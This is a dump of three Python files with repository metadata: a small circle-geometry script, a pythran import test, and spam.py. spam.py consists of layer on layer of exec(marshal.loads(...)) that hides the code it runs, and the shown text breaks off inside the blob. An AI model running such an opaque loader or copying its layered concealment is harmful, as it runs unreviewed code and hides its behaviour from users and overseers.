Python
|
test.py
|
gzheng29/Casimir-programming
|
06927d8a31967e3fd1c842dd5350a79bfa496671
|
[
"MIT"
] | null | null | null |
test.py
|
gzheng29/Casimir-programming
|
06927d8a31967e3fd1c842dd5350a79bfa496671
|
[
"MIT"
] | null | null | null |
test.py
|
gzheng29/Casimir-programming
|
06927d8a31967e3fd1c842dd5350a79bfa496671
|
[
"MIT"
] | null | null | null |
print('hello world')

import numpy as np


def circumference(radius):
    return 2 * np.pi * radius


def surface(radius):
    return np.pi * radius**2
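

# Illustrative usage sketch (not part of the original file): for radius 1,
# the circumference is 2*pi and the surface (disk area) is pi.
print(circumference(1.0))  # ~6.283185
print(surface(1.0))        # ~3.141593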
| 14.6
| 27
| 0.69863
| 23
| 146
| 4.434783
| 0.608696
| 0.235294
| 0.196078
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.016807
| 0.184932
| 146
| 9
| 28
| 16.222222
| 0.840336
| 0
| 0
| 0
| 0
| 0
| 0.075342
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.166667
| 0.333333
| 0.833333
| 0.166667
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
0451770c08269d79ae2228c65b04e05d0ef0ec98
| 167
|
py
|
Python
|
pythran/tests/user_defined_import/builtins_in_imported_main.py
|
davidbrochart/pythran
|
24b6c8650fe99791a4091cbdc2c24686e86aa67c
|
[
"BSD-3-Clause"
] | 1,647
|
2015-01-13T01:45:38.000Z
|
2022-03-28T01:23:41.000Z
|
pythran/tests/user_defined_import/builtins_in_imported_main.py
|
davidbrochart/pythran
|
24b6c8650fe99791a4091cbdc2c24686e86aa67c
|
[
"BSD-3-Clause"
] | 1,116
|
2015-01-01T09:52:05.000Z
|
2022-03-18T21:06:40.000Z
|
pythran/tests/user_defined_import/builtins_in_imported_main.py
|
davidbrochart/pythran
|
24b6c8650fe99791a4091cbdc2c24686e86aa67c
|
[
"BSD-3-Clause"
] | 180
|
2015-02-12T02:47:28.000Z
|
2022-03-14T10:28:18.000Z
|
import builtins_in_imported
from builtins_in_imported import dint

#pythran export entry()
#runas entry()
def entry():
    return dint(), builtins_in_imported.dint()
| 18.555556
| 46
| 0.778443
| 23
| 167
| 5.391304
| 0.521739
| 0.241935
| 0.435484
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.131737
| 167
| 8
| 47
| 20.875
| 0.855172
| 0.209581
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0
| 0.75
| 0.25
| 1.25
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 9
|
f0fcd0c51d95734bd9caa3889e2ca095d3c104b8
| 195,519
|
py
|
Python
|
spam.py
|
reyza98/spon
|
977cf1f46ca2f06977e8fcf6d48b9b5adfca68e0
|
[
"BSD-3-Clause"
] | 39
|
2020-02-26T09:44:36.000Z
|
2022-03-23T00:18:25.000Z
|
Vvvip7/spam.py
|
B4BY-DG/reverse-enginnering
|
b5b46a9f0eee218f2a642b615c77135c33c6f4ad
|
[
"MIT"
] | 15
|
2020-05-14T10:07:26.000Z
|
2022-01-06T02:55:32.000Z
|
Vvvip7/spam.py
|
B4BY-DG/reverse-enginnering
|
b5b46a9f0eee218f2a642b615c77135c33c6f4ad
|
[
"MIT"
] | 41
|
2020-03-16T22:36:38.000Z
|
2022-03-17T14:47:19.000Z
|
import marshal
exec(marshal.loads(b'\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x17\x1b\x01\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x97\x1a\x01\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x17\x1a\x01\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x97\x19\x01\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x17\x19\x01\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x97\x18\x01\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x17\x18\x01\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x97\x17\x01\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x17\x17\x01\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x97\x16\x01\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x17\x16\x01\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x97\x15\x01\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x17\x15\x01\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x97\x14\x01\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x17\x14\x01\x00\xe3\x00\x00\x00\x00\x00
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x97\x13\x01\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x17\x13\x01\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x97\x12\x01\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x17\x12\x01\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x97\x11\x01\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x17\x11\x01\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x97\x10\x01\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x17\x10\x01\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x97\x0f\x01\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x17\x0f\x01\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x97\x0e\x01\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x17\x0e\x01\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x97\r\x01\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x17\r\x01\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x97\x0c\x01\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\
x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x17\x0c\x01\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x97\x0b\x01\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x17\x0b\x01\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x97\n\x01\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x17\n\x01\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x97\t\x01\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x17\t\x01\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x97\x08\x01\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x17\x08\x01\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x97\x07\x01\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x17\x07\x01\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x97\x06\x01\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x17\x06\x01\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x97\x05\x01\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x17\x05\x01\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\
x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x97\x04\x01\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x17\x04\x01\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x97\x03\x01\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x17\x03\x01\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x97\x02\x01\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x17\x02\x01\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x97\x01\x01\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x17\x01\x01\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x97\x00\x01\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x17\x00\x01\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x97\xff\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x17\xff\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x97\xfe\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x17\xfe\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x97\xfd\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x
01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x17\xfd\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x97\xfc\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x17\xfc\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x97\xfb\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x17\xfb\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x97\xfa\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x17\xfa\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x97\xf9\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x17\xf9\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\